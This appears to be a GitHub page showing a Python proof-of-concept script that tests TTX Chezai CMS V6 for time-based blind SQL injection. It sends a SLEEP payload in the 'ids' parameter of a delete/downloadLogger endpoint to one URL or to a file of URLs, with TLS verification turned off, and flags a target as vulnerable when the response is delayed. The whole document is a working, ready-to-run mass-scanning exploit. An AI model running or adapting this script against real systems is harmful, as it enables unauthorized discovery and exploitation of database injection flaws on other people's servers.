forked from ATonysan/poc-exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathTTXChezaiCMSV6_SQLinjection.py
45 lines (40 loc) · 1.42 KB
/
TTXChezaiCMSV6_SQLinjection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import urllib3
import re,string,random
from urllib.parse import urljoin
import argparse
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def read_file(file_path):
with open(file_path, 'r') as file:
urls = file.read().splitlines()
return urls
def check(url):
url = url.rstrip("/")
taeget = urljoin(url, "/run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1")
headers = {
"User-Agent": "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95",
}
try:
response = requests.get(taeget, verify=False, headers=headers, timeout=25)
if 5 <= response.elapsed.total_seconds() < 15 and 'pagination' in response.text and 'resMap' in response.text:
print(f"\033[31mDiscovered;{url}: TTXChezaiCMSV6_SQL injection!\033[0m")
return True
except Exception as e:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL")
parser.add_argument("-f", "--txt", help="file")
args = parser.parse_args()
url = args.url
txt = args.txt
if url:
check(url)
elif txt:
urls = read_file(txt)
for url in urls:
check(url)
else:
print("help")